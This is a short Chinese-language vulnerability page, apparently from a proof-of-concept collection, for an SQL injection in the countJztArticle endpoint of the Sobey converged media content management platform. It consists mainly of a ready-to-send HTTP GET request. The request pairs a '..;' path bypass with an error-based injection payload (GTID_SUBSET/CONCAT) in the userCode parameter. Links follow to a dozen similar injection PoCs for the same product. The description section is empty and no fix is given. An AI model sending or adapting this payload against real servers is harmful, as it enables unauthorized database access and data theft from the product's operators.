索贝融合媒体内容管理平台 countJztArticle SQL注入漏洞

漏洞描述

PoC代码

GET /sobey-mchEditor/js/..;/mch/Jzt/statistics/countJztArticle?siteCode=&token=&userCode=admin&channelId=1&isRenYuan=1&userCode=1'+AND+GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(1709=1709,1))),md5(1)),1709)and+'1'='1 HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

相关漏洞推荐

• POC 索贝融媒体 /sobey-mchEditor/mch/Jzt/statistics/countJztArticleGroupByChannel2 SQL 注入漏洞
• 索贝融合媒体内容管理平台 reUploadBase64 SQL注入漏洞
• 索贝融合媒体内容管理平台 countPtBusinessNumList SQL注入漏洞
• 索贝融合媒体内容管理平台 countBusinessNumList SQL注入漏洞
• 索贝融合媒体内容管理平台 userBusinessNumListDetial SQL注入漏洞
• 索贝融合媒体内容管理平台 userBusinessNumList SQL注入漏洞
• 索贝融合媒体内容管理平台 catalogArticles SQL注入漏洞
• 索贝融合媒体内容管理平台 articleExamineExport SQL注入漏洞
• 索贝融合媒体内容管理平台 queryEditorScoreRank SQL注入漏洞
• 索贝融合媒体内容管理平台 countJztMonthsDetailArticle SQL注入漏洞
• 索贝融合媒体内容管理平台 countJztTWArticle SQL注入漏洞
• POC 索贝融合媒体内容管理平台 countJztArticleGroupByChannel2 SQL注入漏洞
• 索贝融合媒体内容管理平台 list SQL注入漏洞